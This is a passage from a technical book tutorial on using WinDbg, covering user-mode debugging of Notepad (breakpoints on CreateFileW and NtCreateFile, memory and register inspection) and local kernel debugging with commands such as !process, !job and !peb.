• LastErrorValue - last Win32 error code (GetLastError).
• TlsStorage - Thread Local Storage (TLS) array for this thread (full explanation of TLS is beyond the
scope of this book).
• PEB Address - address of the Process Environment Block (PEB), viewable with the !peb command.
• LastStatusValue - last NTSTATUS value returned from a system call.
• The !teb command (and similar commands) shows parts of the real data structure behind the
scenes, in this case _TEB. You can always look at the real structure using the dt (display type)
command:
0:000> dt ntdll!_teb
   +0x000 NtTib            : _NT_TIB
   +0x038 EnvironmentPointer : Ptr64 Void
   +0x040 ClientId         : _CLIENT_ID
   +0x050 ActiveRpcHandle  : Ptr64 Void
   +0x058 ThreadLocalStoragePointer : Ptr64 Void
   +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
   ...
   +0x1808 LockCount       : Uint4B
   +0x180c WowTebOffset    : Int4B
   +0x1810 ResourceRetValue : Ptr64 Void
   +0x1818 ReservedForWdf  : Ptr64 Void
   +0x1820 ReservedForCrt  : Uint8B
   +0x1828 EffectiveContainerId : _GUID
Notice that WinDbg is not case sensitive when it comes to symbols. Also, notice the structure name starting
with an underscore; this is the way most structures are defined in Windows (user-mode and kernel-mode).
Using the typedef name (without the underscore) may or may not work, so always using the underscore
is recommended.
How do you know which module defines a structure you wish to view? If the structure
is documented, the module would be listed in the docs for the structure. You can also try
specifying the structure without the module name, forcing the debugger to search for it.
Generally, you “know” where the structure is defined with experience and sometimes context.
If you attach an address to the previous command, you can get the actual values of data members:
0:000> dt ntdll!_teb 00000001`2229d000
   +0x000 NtTib            : _NT_TIB
   +0x038 EnvironmentPointer : (null)
   +0x040 ClientId         : _CLIENT_ID
   +0x050 ActiveRpcHandle  : (null)
   +0x058 ThreadLocalStoragePointer : 0x000001c9`3676c940 Void
   +0x060 ProcessEnvironmentBlock : 0x00000001`2229c000 _PEB
   +0x068 LastErrorValue   : 0
   ...
   +0x1808 LockCount       : 0
   +0x180c WowTebOffset    : 0n0
   +0x1810 ResourceRetValue : 0x000001c9`3677fd00 Void
   +0x1818 ReservedForWdf  : (null)
   +0x1820 ReservedForCrt  : 0
   +0x1828 EffectiveContainerId : _GUID {00000000-0000-0000-0000-000000000000}
Each member is shown with its offset from the beginning of the structure, its name, and its value. Simple
values are shown directly, while structure values (such as NtTib above) are shown with a hyperlink.
Clicking this hyperlink provides the details of the structure.
Click on the NtTib member above to show the details of this data member:
0:000> dx -r1 (*((ntdll!_NT_TIB *)0x12229d000))
(*((ntdll!_NT_TIB *)0x12229d000))                 [Type: _NT_TIB]
    [+0x000] ExceptionList    : 0x0 [Type: _EXCEPTION_REGISTRATION_RECORD *]
    [+0x008] StackBase        : 0x122480000 [Type: void *]
    [+0x010] StackLimit       : 0x12246f000 [Type: void *]
    [+0x018] SubSystemTib     : 0x0 [Type: void *]
    [+0x020] FiberData        : 0x1e00 [Type: void *]
    [+0x020] Version          : 0x1e00 [Type: unsigned long]
    [+0x028] ArbitraryUserPointer : 0x0 [Type: void *]
    [+0x030] Self             : 0x12229d000 [Type: _NT_TIB *]
The debugger uses the newer dx command to view data. See the section “Advanced Debugging with
WinDbg” later in this chapter for more on the dx command.
If you don’t see hyperlinks, you may be using a very old WinDbg, where Debugger Markup Language
(DML) is not on by default. You can turn it on with the .prefer_dml 1 command.
Now let’s turn our attention to breakpoints. Let’s set a breakpoint when a file is opened by notepad.
• Type the following command to set a breakpoint in the CreateFile API function:
0:000> bp kernel32!createfilew
Notice the function name is in fact CreateFileW, as there is no function called CreateFile. In code,
this is a macro that expands to CreateFileW (wide, Unicode version) or CreateFileA (ASCII or Ansi
version) based on a compilation constant named UNICODE. WinDbg responds with nothing. This is a good
thing.
The reason there are two sets of functions for most APIs where strings are involved is a historical
one. In any case, Visual Studio projects define the UNICODE constant by default, so Unicode is
the norm. This is a good thing - most of the A functions convert their input to Unicode and call
the W function.
You can list the existing breakpoints with the bl command:
0:000> bl
0 e Disable Clear  00007ffc`1f652300     0001 (0001)  0:**** KERNEL32!CreateFileW
You can see the breakpoint index (0), whether it’s enabled or disabled (e=enabled, d=disabled), and you
get DML hyperlinks to disable (bd command) and delete (bc command) the breakpoint.
Now let notepad continue execution, until the breakpoint hits:
Type the g command or press the Go button on the toolbar or hit F5:
You’ll see the debugger showing Busy in the prompt and the command area shows Debuggee is running,
meaning you cannot enter commands until the next break.
Notepad should now be alive. Go to its File menu and select Open…. The debugger should spew details of
module loads and then break:
Breakpoint 0 hit
KERNEL32!CreateFileW:
00007ffc`1f652300 ff25aa670500    jmp     qword ptr [KERNEL32!_imp_CreateFileW (00007ffc`1f6a8ab0)] ds:00007ffc`1f6a8ab0={KERNELBASE!CreateFileW (00007ffc`1c75e260)}
• We have hit the breakpoint! Notice the thread in which it occurred. Let’s see what the call stack
looks like (it may take a while to show if the debugger needs to download symbols from Microsoft’s
symbol server):
0:002> k
 # Child-SP          RetAddr           Call Site
00 00000001`226fab08 00007ffc`061c8368 KERNEL32!CreateFileW
01 00000001`226fab10 00007ffc`061c5d4d mscoreei!RuntimeDesc::VerifyMainRuntimeModule+0x2c
02 00000001`226fab60 00007ffc`061c6068 mscoreei!FindRuntimesInInstallRoot+0x2fb
03 00000001`226fb3e0 00007ffc`061cb748 mscoreei!GetOrCreateSxSProcessInfo+0x94
04 00000001`226fb460 00007ffc`061cb62b mscoreei!CLRMetaHostPolicyImpl::GetRequestedRuntimeHelper+0xfc
05 00000001`226fb740 00007ffc`061ed4e6 mscoreei!CLRMetaHostPolicyImpl::GetRequestedRuntime+0x120
...
21 00000001`226fede0 00007ffc`1df025b2 SHELL32!CFSIconOverlayManager::LoadNonloadedOverlayIdentifiers+0xaa
22 00000001`226ff320 00007ffc`1df022af SHELL32!EnableExternalOverlayIdentifiers+0x46
23 00000001`226ff350 00007ffc`1def434e SHELL32!CFSIconOverlayManager::RefreshOverlayImages+0xff
24 00000001`226ff390 00007ffc`1cf250a3 SHELL32!SHELL32_GetIconOverlayManager+0x6e
25 00000001`226ff3c0 00007ffc`1ceb2726 windows_storage!CFSFolder::_GetOverlayInfo+0x12b
26 00000001`226ff470 00007ffc`1cf3108b windows_storage!CAutoDestItemsFolder::GetOverlayIndex+0xb6
27 00000001`226ff4f0 00007ffc`1cf30f87 windows_storage!CRegFolder::_GetOverlayInfo+0xbf
28 00000001`226ff5c0 00007ffb`df8fc4d1 windows_storage!CRegFolder::GetOverlayIndex+0x47
29 00000001`226ff5f0 00007ffb`df91f095 explorerframe!CNscOverlayTask::_Extract+0x51
2a 00000001`226ff640 00007ffb`df8f70c2 explorerframe!CNscOverlayTask::InternalResumeRT+0x45
2b 00000001`226ff670 00007ffc`1cf7b58c explorerframe!CRunnableTask::Run+0xb2
2c 00000001`226ff6b0 00007ffc`1cf7b245 windows_storage!CShellTask::TT_Run+0x3c
2d 00000001`226ff6e0 00007ffc`1cf7b125 windows_storage!CShellTaskThread::ThreadProc+0xdd
2e 00000001`226ff790 00007ffc`1db32ac6 windows_storage!CShellTaskThread::s_ThreadProc+0x35
2f 00000001`226ff7c0 00007ffc`204521c5 shcore!ExecuteWorkItemThreadProc+0x16
30 00000001`226ff7f0 00007ffc`204305c4 ntdll!RtlpTpWorkCallback+0x165
31 00000001`226ff8d0 00007ffc`1f647974 ntdll!TppWorkerThread+0x644
32 00000001`226ffbc0 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
33 00000001`226ffbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
Your call stack may be different, as it depends on the Windows version, and any extensions that may be
loaded and used by the open file dialog box.
What can we do at this point? You may wonder what file is being opened. We can get that information
based on the calling convention of the CreateFileW function. Since this is a 64-bit process (and the
processor is Intel/AMD), the calling convention states that the first integer/pointer arguments are passed
in the RCX, RDX, R8, and R9 registers (in this order). Since the file name in CreateFileW is the first
argument, the relevant register is RCX.
You can get more information on calling conventions in the Debugger documentation (or in several web
resources).
Display the value of the RCX register with the r command (you’ll get a different value):
0:002> r rcx
rcx=00000001226fabf8
We can view the memory pointed by RCX with various d (display) family of commands. Here is the db
command, interpreting the data as bytes.
0:002> db 00000001226fabf8
00000001`226fabf8  43 00 3a 00 5c 00 57 00-69 00 6e 00 64 00 6f 00  C.:.\.W.i.n.d.o.
00000001`226fac08  77 00 73 00 5c 00 4d 00-69 00 63 00 72 00 6f 00  w.s.\.M.i.c.r.o.
00000001`226fac18  73 00 6f 00 66 00 74 00-2e 00 4e 00 45 00 54 00  s.o.f.t...N.E.T.
00000001`226fac28  5c 00 46 00 72 00 61 00-6d 00 65 00 77 00 6f 00  \.F.r.a.m.e.w.o.
00000001`226fac38  72 00 6b 00 36 00 34 00-5c 00 5c 00 76 00 32 00  r.k.6.4.\.\.v.2.
00000001`226fac48  2e 00 30 00 2e 00 35 00-30 00 37 00 32 00 37 00  ..0...5.0.7.2.7.
00000001`226fac58  5c 00 63 00 6c 00 72 00-2e 00 64 00 6c 00 6c 00  \.c.l.r...d.l.l.
00000001`226fac68  00 00 76 1c fc 7f 00 00-00 00 00 00 00 00 00 00  ..v.............
The db command shows the memory in bytes, and ASCII characters on the right. It’s pretty clear what
the file name is, but because the string is Unicode, it’s not very convenient to see.
Use the du command to view Unicode strings more conveniently:
0:002> du 00000001226fabf8
00000001`226fabf8  "C:\Windows\Microsoft.NET\Framewo"
00000001`226fac38  "rk64\\v2.0.50727\clr.dll"
You can use a register value directly by prefixing its name with @:
0:002> du @rcx
00000001`226fabf8  "C:\Windows\Microsoft.NET\Framewo"
00000001`226fac38  "rk64\\v2.0.50727\clr.dll"
Similarly, you can view the value of the second argument by looking at the rdx register.
Now let’s set another breakpoint in the native API that is called by CreateFileW - NtCreateFile:
0:002> bp ntdll!ntcreatefile
0:002> bl
0 e Disable Clear  00007ffc`1f652300     0001 (0001)  0:**** KERNEL32!CreateFileW
1 e Disable Clear  00007ffc`20480120     0001 (0001)  0:**** ntdll!NtCreateFile
Notice the native API never uses W or A - it always works with Unicode strings (in fact it expects
UNICODE_STRING structures, as we’ve seen already).
Continue execution with the g command. The debugger should break:
Breakpoint 1 hit
ntdll!NtCreateFile:
00007ffc`20480120 4c8bd1          mov     r10,rcx
Check the call stack again:
0:002> k
 # Child-SP          RetAddr           Call Site
00 00000001`226fa938 00007ffc`1c75e5d6 ntdll!NtCreateFile
01 00000001`226fa940 00007ffc`1c75e2c6 KERNELBASE!CreateFileInternal+0x2f6
02 00000001`226faab0 00007ffc`061c8368 KERNELBASE!CreateFileW+0x66
03 00000001`226fab10 00007ffc`061c5d4d mscoreei!RuntimeDesc::VerifyMainRuntimeModule+0x2c
04 00000001`226fab60 00007ffc`061c6068 mscoreei!FindRuntimesInInstallRoot+0x2fb
05 00000001`226fb3e0 00007ffc`061cb748 mscoreei!GetOrCreateSxSProcessInfo+0x94
...
List the next 8 instructions that are about to be executed with the u (unassemble or disassemble) command:
0:002> u
ntdll!NtCreateFile:
00007ffc`20480120 4c8bd1           mov     r10,rcx
00007ffc`20480123 b855000000       mov     eax,55h
00007ffc`20480128 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffc`20480130 7503             jne     ntdll!NtCreateFile+0x15 (00007ffc`20480135)
00007ffc`20480132 0f05             syscall
00007ffc`20480134 c3               ret
00007ffc`20480135 cd2e             int     2Eh
00007ffc`20480137 c3               ret
Notice the value 0x55 is copied to the EAX register. This is the system service number for NtCreateFile,
as described in chapter 1. The syscall instruction shown is the one causing the transition to kernel-mode,
and then executing the NtCreateFile system service itself.
You can step over the next instruction with the p command (step - hit F10 as an alternative). You can step
into a function (in case of assembly, this is the call instruction) with the t command (trace - hit F11 as
an alternative):
0:002> p
Breakpoint 1 hit
ntdll!NtCreateFile:
00007ffc`20480120 4c8bd1           mov     r10,rcx
0:002> p
ntdll!NtCreateFile+0x3:
00007ffc`20480123 b855000000       mov     eax,55h
0:002> p
ntdll!NtCreateFile+0x8:
00007ffc`20480128 f604250803fe7f01 test    byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1 ds:00000000`7ffe0308=00
0:002> p
ntdll!NtCreateFile+0x10:
00007ffc`20480130 7503             jne     ntdll!NtCreateFile+0x15 (00007ffc`20480135) [br=0]
0:002> p
ntdll!NtCreateFile+0x12:
00007ffc`20480132 0f05             syscall
Stepping inside a syscall is not possible, as we’re in user-mode. When we step over/into it, all is done
and we get back a result.
0:002> p
ntdll!NtCreateFile+0x14:
00007ffc`20480134 c3               ret
The return value of functions in x64 calling convention is stored in EAX or RAX. For system calls, it’s an
NTSTATUS, so EAX contains the returned status:
0:002> r eax
eax=c0000034
Zero means success, and a negative value (in two’s complement, most significant bit is set) means an error.
We can get a textual description of the error with the !error command:
0:002> !error @eax
Error code: (NTSTATUS) 0xc0000034 (3221225524) - Object Name not found.
This means the file wasn’t found on the system.
Disable all breakpoints and let Notepad continue execution normally:
0:002> bd *
0:002> g
Since we have no breakpoints at this time, we can force a break by clicking the Break button on the toolbar,
or hitting Ctrl+Break on the keyboard:
(874c.16a54): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffc`20483080 cc              int     3
Notice the thread number in the prompt. Show all current threads:
0:022> ~
   0  Id: 874c.18068 Suspend: 1 Teb: 00000001`2229d000 Unfrozen
   1  Id: 874c.46ac Suspend: 1 Teb: 00000001`222a5000 Unfrozen
   2  Id: 874c.152cc Suspend: 1 Teb: 00000001`222a7000 Unfrozen
   3  Id: 874c.f7ec Suspend: 1 Teb: 00000001`222ad000 Unfrozen
   4  Id: 874c.145b4 Suspend: 1 Teb: 00000001`222af000 Unfrozen
...
  18  Id: 874c.f0c4 Suspend: 1 Teb: 00000001`222d1000 Unfrozen
  19  Id: 874c.17414 Suspend: 1 Teb: 00000001`222d3000 Unfrozen
  20  Id: 874c.c878 Suspend: 1 Teb: 00000001`222d5000 Unfrozen
  21  Id: 874c.d8c0 Suspend: 1 Teb: 00000001`222d7000 Unfrozen
.  22  Id: 874c.16a54 Suspend: 1 Teb: 00000001`222e1000 Unfrozen
  23  Id: 874c.10838 Suspend: 1 Teb: 00000001`222db000 Unfrozen
  24  Id: 874c.10cf0 Suspend: 1 Teb: 00000001`222dd000 Unfrozen
Lots of threads, right? These were created by the common open dialog, so not the direct fault of Notepad.
Continue exploring the debugger in any way you want!
Find out the system service numbers for NtWriteFile and NtReadFile.
If you close Notepad, you’ll hit a breakpoint at process termination:
ntdll!NtTerminateProcess+0x14:
00007ffc`2047fc14 c3              ret
0:000> k
 # Child-SP          RetAddr           Call Site
00 00000001`2247f6a8 00007ffc`20446dd8 ntdll!NtTerminateProcess+0x14
01 00000001`2247f6b0 00007ffc`1f64d62a ntdll!RtlExitUserProcess+0xb8
02 00000001`2247f6e0 00007ffc`061cee58 KERNEL32!ExitProcessImplementation+0xa
03 00000001`2247f710 00007ffc`0644719e mscoreei!RuntimeDesc::ShutdownAllActiveRuntimes+0x287
04 00000001`2247fa00 00007ffc`1fcda291 mscoree!ShellShim_CorExitProcess+0x11e
05 00000001`2247fa30 00007ffc`1fcda2ad msvcrt!_crtCorExitProcess+0x4d
06 00000001`2247fa60 00007ffc`1fcda925 msvcrt!_crtExitProcess+0xd
07 00000001`2247fa90 00007ff7`5383ae1e msvcrt!doexit+0x171
08 00000001`2247fb00 00007ffc`1f647974 notepad!__mainCRTStartup+0x1b6
09 00000001`2247fbc0 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
0a 00000001`2247fbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
You can use the q command to quit the debugger. If the process is still alive, it will be terminated. An
alternative is to use the .detach command to disconnect from the target without killing it.
Kernel Debugging
User-mode debugging involves the debugger attaching to a process, setting breakpoints that cause the
process’ threads to become suspended, and so on. Kernel-mode debugging, on the other hand, involves
controlling the entire machine with the debugger. This means that if a breakpoint is set and then hit, the
entire machine is frozen. Clearly, this cannot be achieved with a single machine. In full kernel debugging,
two machines are involved: a host (where the debugger runs) and a target (being debugged). The target can,
however, be a virtual machine hosted on the same machine (host) where the debugger executes. Figure
5-5 shows a host and target connected via some connection medium.
Figure 5-5: Host-target connection
Before we get into full kernel debugging, we’ll take a look at its simpler cousin - local kernel debugging.
Local Kernel Debugging
Local kernel debugging (LKD) allows viewing system memory and other system information on the local
machine. The primary difference between local and full kernel debugging, is that with LKD there is no
way to set up breakpoints, which means you’re always looking at the current state of the system. It also
means that things change, even while commands are being executed, so some information may be stale
or unreliable. With full kernel debugging, commands can only be entered while the target system is in a
breakpoint, so system state is unchanged.
To configure LKD, enter the following in an elevated command prompt and then restart the system:
bcdedit /debug on
Local Kernel Debugging is protected by Secure Boot on Windows 10, Server 2016, and later. To
activate LKD you’ll have to disable Secure Boot in the machine’s BIOS settings. If, for whatever
reason, this is not possible, there is an alternative using the Sysinternals LiveKd tool. Copy
LiveKd.exe to the Debugging Tools for Windows main directory. Then launch WinDbg using
LiveKd with the following command: livekd -w. The experience is not the same, as data may
become stale because of the way LiveKd works, and you may need to exit the debugger and
relaunch from time to time.
After the system is restarted, launch WinDbg elevated (the 64-bit one, if you are on a 64-bit system). Select
the menu File / Attach To Kernel (WinDbg preview) or File / Kernel Debug… (classic WinDbg). Select the
Local tab and click OK. You should see output similar to the following:
Microsoft (R) Windows Debugger Version 10.0.22415.1003 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Connected to Windows 10 22000 x64 target at (Wed Sep 29 10:57:30.682 2021 (UTC + 3:00)), ptr64 TRUE

************* Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*c:\symbols*https://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*c:\symbols*https://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 10 Kernel Version 22000 MP (6 procs) Free x64
Product: WinNt, suite: TerminalServer SingleUserTS
Edition build lab: 22000.1.amd64fre.co_release.210604-1628
Machine Name:
Kernel base = 0xfffff802`07a00000 PsLoadedModuleList = 0xfffff802`08629710
Debug session time: Wed Sep 29 10:57:30.867 2021 (UTC + 3:00)
System Uptime: 0 days 16:44:39.106
Note the prompt displays lkd. This indicates Local Kernel Debugging is active.
Local Kernel Debugging Tutorial
If you’re familiar with kernel debugging commands, you can safely skip this section.
You can display basic information for all processes running on the system with the !process 0 0
command:
lkd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS ffffd104936c8040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 006d5000  ObjectTable: ffffa58d3cc44d00  HandleCount: 3909.
    Image: System

PROCESS ffffd104936e2080
    SessionId: none  Cid: 0058    Peb: 00000000  ParentCid: 0004
    DirBase: 0182c000  ObjectTable: ffffa58d3cc4ea40  HandleCount:   0.
    Image: Secure System

PROCESS ffffd1049370a080
    SessionId: none  Cid: 0090    Peb: 00000000  ParentCid: 0004
    DirBase: 011b6000  ObjectTable: ffffa58d3cc65a80  HandleCount:   0.
    Image: Registry

PROCESS ffffd10497dd0080
    SessionId: none  Cid: 024c    Peb: bc6c2ba000  ParentCid: 0004
    DirBase: 10be4b000  ObjectTable: ffffa58d3d49ddc0  HandleCount:  60.
    Image: smss.exe
...
For each process, the following information is displayed:
• The address attached to the PROCESS text is the EPROCESS address of the process (in kernel space,
of course).
• SessionId - the session the process is running under.
• Cid - (client ID) the unique process ID.
• Peb - the address of the Process Environment Block (PEB). This address is in user space, naturally.
• ParentCid - (parent client ID) the process ID of the parent process. Note that it’s possible the parent
process no longer exists, so this ID may belong to some process created after the parent process
terminated.
• DirBase - physical address of the Master Page Directory for this process, used as the basis for virtual
to physical address translation. On x64, this is known as Page Map Level 4, and on x86 it’s Page
Directory Pointer Table (PDPT).
• ObjectTable - pointer to the private handle table for the process.
• HandleCount - number of handles in the handle table for this process.
• Image - executable name, or special process name for those not associated with an executable (such
as Secure System, System, Mem Compression).
The !process command accepts at least two arguments. The first indicates the process of interest using its
EPROCESS address or the unique Process ID, where zero means “all or any process”. The second argument
is the level of detail to display (a bit mask), where zero means the least amount of detail. A third argument
can be added to search for a particular executable. Here are a few examples:
List all processes running explorer.exe:
lkd> !process 0 0 explorer.exe
PROCESS ffffd1049e118080
    SessionId: 1  Cid: 1780    Peb: 0076b000  ParentCid: 16d0
    DirBase: 362ea5000  ObjectTable: ffffa58d45891680  HandleCount: 3208.
    Image: explorer.exe

PROCESS ffffd104a14e2080
    SessionId: 1  Cid: 2548    Peb: 005c1000  ParentCid: 0314
    DirBase: 140fe9000  ObjectTable: ffffa58d46a99500  HandleCount: 2613.
    Image: explorer.exe
List more information for a specific process by specifying its address and a higher level of detail:
lkd> !process ffffd1049e7a60c0 1
PROCESS ffffd1049e7a60c0
    SessionId: 1  Cid: 1374    Peb: d3e343000  ParentCid: 0314
    DirBase: 37eb97000  ObjectTable: ffffa58d58a9de00  HandleCount: 224.
    Image: dllhost.exe
    VadRoot ffffd104b81c7db0 Vads 94 Clone 0 Private 455. Modified 2. Locked 0.
    DeviceMap ffffa58d41354230
    Token                             ffffa58d466e0060
    ElapsedTime                       01:04:36.652
    UserTime                          00:00:00.015
    KernelTime                        00:00:00.015
    QuotaPoolUsage[PagedPool]         201696
    QuotaPoolUsage[NonPagedPool]      13048
    Working Set Sizes (now,min,max)   (4330, 50, 345) (17320KB, 200KB, 1380KB)
    PeakWorkingSetSize                4581
    VirtualSize                       2101383 Mb
    PeakVirtualSize                   2101392 Mb
    PageFaultCount                    5427
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      678
    Job                               ffffd104a05ed380
As can be seen from the above output, more information on the process is displayed. Some of this
information is hyperlinked, allowing easy further examination. For example, the job this process is part of
(if any) is a hyperlink, executing the !job command if clicked.
Click on the Job address hyperlink:
lkd> !job ffffd104a05ed380
Job at ffffd104a05ed380
  Basic Accounting Information
    TotalUserTime:             0x0
    TotalKernelTime:           0x0
    TotalCycleTime:            0x0
    ThisPeriodTotalUserTime:   0x0
    ThisPeriodTotalKernelTime: 0x0
    TotalPageFaultCount:       0x0
    TotalProcesses:            0x1
    ActiveProcesses:           0x1
    FreezeCount:               0
    BackgroundCount:           0
    TotalTerminatedProcesses:  0x0
    PeakJobMemoryUsed:         0x2f5
    PeakProcessMemoryUsed:     0x2f5
  Job Flags
    [wake notification allocated]
    [wake notification enabled]
    [timers virtualized]
  Limit Information (LimitFlags: 0x800)
  Limit Information (EffectiveLimitFlags: 0x403800)
    JOB_OBJECT_LIMIT_BREAKAWAY_OK
A Job is a kernel object that manages one or more processes, for which it can apply various
limits and get accounting information. A discussion of jobs is beyond the scope of this book.
More information can be found in the Windows Internals 7th edition part 1 and Windows 10
System Programming, Part 1 books.
As usual, a command such as !job hides some information available in the real data structure. In this
case, the type is EJOB. Use the command dt nt!_ejob with the job address to see all the details.
The PEB of a process can be viewed as well by clicking its hyperlink. This is similar to the !peb command
used in user mode, but the twist here is that the correct process context must be set first, as the address is
in user space. Click the Peb hyperlink. You should see something like this:
lkd> .process /p ffffd1049e7a60c0; !peb d3e343000
Implicit process is now ffffd104`9e7a60c0
PEB at 0000000d3e343000
    InheritedAddressSpace:    No
    ReadImageFileExecOptions: No
    BeingDebugged:            No
    ImageBaseAddress:         00007ff661180000
    NtGlobalFlag:             0
    NtGlobalFlag2:            0
    Ldr                       00007ffb37ef9120
    Ldr.Initialized:          Yes
    Ldr.InInitializationOrderModuleList: 000001d950004560 . 000001d95005a960
    Ldr.InLoadOrderModuleList:           000001d9500046f0 . 000001d95005a940
    Ldr.InMemoryOrderModuleList:         000001d950004700 . 000001d95005a950
            Base TimeStamp                     Module
    7ff661180000 93f44fbf Aug 29 00:12:31 2048 C:\WINDOWS\system32\DllHost.exe
    7ffb37d80000 50702a8c Oct 06 15:56:44 2012 C:\WINDOWS\SYSTEM32\ntdll.dll
    7ffb36790000 ae0b35b0 Jul 13 01:50:24 2062 C:\WINDOWS\System32\KERNEL32.DLL
...
The correct process context is set with the .process meta command, and then the PEB is displayed.
This is a general technique you need to use to show memory that is in user space - always make sure the
debugger is set to the correct process context.
Execute the !process command again, but with the second bit set for the details:
lkd> !process ffffd1049e7a60c0 2
PROCESS ffffd1049e7a60c0
    SessionId: 1  Cid: 1374    Peb: d3e343000  ParentCid: 0314
    DirBase: 37eb97000  ObjectTable: ffffa58d58a9de00  HandleCount: 221.
    Image: dllhost.exe

        THREAD ffffd104a02de080  Cid 1374.022c  Teb: 0000000d3e344000 Win32Thread: ffffd104b82ccbb0 WAIT: (UserRequest) UserMode Non-Alertable
            ffffd104b71d2860  SynchronizationEvent

        THREAD ffffd104a45e8080  Cid 1374.0f04  Teb: 0000000d3e352000 Win32Thread: ffffd104b82ccd90 WAIT: (WrUserRequest) UserMode Non-Alertable
            ffffd104adc5e0c0  QueueObject

        THREAD ffffd104a229a080  Cid 1374.1ed8  Teb: 0000000d3e358000 Win32Thread: ffffd104b82cf900 WAIT: (UserRequest) UserMode Non-Alertable
            ffffd104b71dfb60  NotificationEvent
            ffffd104ad02a740  QueueObject

        THREAD ffffd104b78ee040  Cid 1374.0330  Teb: 0000000d3e37a000 Win32Thread: 0000000000000000 WAIT: (WrQueue) UserMode Alertable
            ffffd104adc4f640  QueueObject
Detail level 2 shows a summary of the threads in the process along with the object(s) they are waiting on
(if any).
You can use other detail values (4, 8), or combine them, such as 3 (1 or 2).
Repeat the !process command again, but this time with no detail level. More information is shown for
the process (the default in this case is full details):
lkd> !process ffffd1049e7a60c0
PROCESS ffffd1049e7a60c0
    SessionId: 1  Cid: 1374    Peb: d3e343000  ParentCid: 0314
    DirBase: 37eb97000  ObjectTable: ffffa58d58a9de00  HandleCount: 223.
    Image: dllhost.exe
    VadRoot ffffd104b81c7db0 Vads 94 Clone 0 Private 452. Modified 2. Locked 0.
    DeviceMap ffffa58d41354230
    Token                             ffffa58d466e0060
    ElapsedTime                       01:10:30.521
    UserTime                          00:00:00.015
    KernelTime                        00:00:00.015
    QuotaPoolUsage[PagedPool]         201696
    QuotaPoolUsage[NonPagedPool]      13048
    Working Set Sizes (now,min,max)   (4329, 50, 345) (17316KB, 200KB, 1380KB)
    PeakWorkingSetSize                4581
    VirtualSize                       2101383 Mb
    PeakVirtualSize                   2101392 Mb
    PageFaultCount                    5442
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      678
    Job                               ffffd104a05ed380

        THREAD ffffd104a02de080  Cid 1374.022c  Teb: 0000000d3e344000 Win32Thread: ffffd104b82ccbb0 WAIT: (UserRequest) UserMode Non-Alertable
            ffffd104b71d2860  SynchronizationEvent
            Not impersonating
            DeviceMap                 ffffa58d41354230
            Owning Process            ffffd1049e7a60c0       Image:         dllhost.exe
            Attached Process          N/A            Image:         N/A
            Wait Start TickCount      3641927        Ticks: 270880 (0:01:10:32.500)
            Context Switch Count      27             IdealProcessor: 2
            UserTime                  00:00:00.000
            KernelTime                00:00:00.000
            Win32 Start Address 0x00007ff661181310
            Stack Init ffffbe88b4bdf630 Current ffffbe88b4bdf010
            Base ffffbe88b4be0000 Limit ffffbe88b4bd9000 Call 0000000000000000
            Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
            Kernel stack not resident.
        THREAD ffffd104a45e8080  Cid 1374.0f04  Teb: 0000000d3e352000 Win32Thread: ffffd104b82ccd90 WAIT: (WrUserRequest) UserMode Non-Alertable
            ffffd104adc5e0c0  QueueObject
            Not impersonating
            DeviceMap                 ffffa58d41354230
            Owning Process            ffffd1049e7a60c0       Image:         dllhost.exe
            Attached Process          N/A            Image:         N/A
            Wait Start TickCount      3910734        Ticks: 2211 (0:00:00:34.546)
            Context Switch Count      2684           IdealProcessor: 4
            UserTime                  00:00:00.046
            KernelTime                00:00:00.078
            Win32 Start Address 0x00007ffb3630f230
            Stack Init ffffbe88b4c87630 Current ffffbe88b4c86a10
            Base ffffbe88b4c88000 Limit ffffbe88b4c81000 Call 0000000000000000
            Priority 10 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
            Child-SP          RetAddr           Call Site
            ffffbe88`b4c86a50 fffff802`07c5dc17 nt!KiSwapContext+0x76
            ffffbe88`b4c86b90 fffff802`07c5fac9 nt!KiSwapThread+0x3a7
            ffffbe88`b4c86c70 fffff802`07c59d24 nt!KiCommitThreadWait+0x159
            ffffbe88`b4c86d10 fffff802`07c8ac70 nt!KeWaitForSingleObject+0x234
            ffffbe88`b4c86e00 fffff9da`6d577d46 nt!KeWaitForMultipleObjects+0x540
            ffffbe88`b4c86f00 fffff99c`c175d920 0xfffff9da`6d577d46
            ffffbe88`b4c86f08 fffff99c`c175d920 0xfffff99c`c175d920
            ffffbe88`b4c86f10 00000000`00000001 0xfffff99c`c175d920
            ffffbe88`b4c86f18 ffffd104`9a423df0 0x1
            ffffbe88`b4c86f20 00000000`00000001 0xffffd104`9a423df0
            ffffbe88`b4c86f28 ffffbe88`b4c87100 0x1
            ffffbe88`b4c86f30 00000000`00000000 0xffffbe88`b4c87100
...
The command lists all threads within the process. Each thread is represented by its ETHREAD address
attached to the text “THREAD”. The call stack is listed as well - the module prefix “nt” represents the
kernel - there is no need to use the real kernel module name.
One of the reasons to use “nt” instead of explicitly stating the kernel’s module name is that these names
differ between 64-bit and 32-bit systems (ntoskrnl.exe on 64 bit, and ntkrnlpa.exe on 32 bit); it’s also a
lot shorter.
User-mode symbols are not loaded by default, so thread stacks that span to user mode show just numeric
addresses. You can load user symbols explicitly with .reload /user after setting the process context to
the process of interest with the .process command:
lkd> !process 0 0 explorer.exe
PROCESS ffffd1049e118080
    SessionId: 1  Cid: 1780    Peb: 0076b000  ParentCid: 16d0
    DirBase: 362ea5000  ObjectTable: ffffa58d45891680  HandleCount: 3217.
    Image: explorer.exe

PROCESS ffffd104a14e2080
    SessionId: 1  Cid: 2548    Peb: 005c1000  ParentCid: 0314
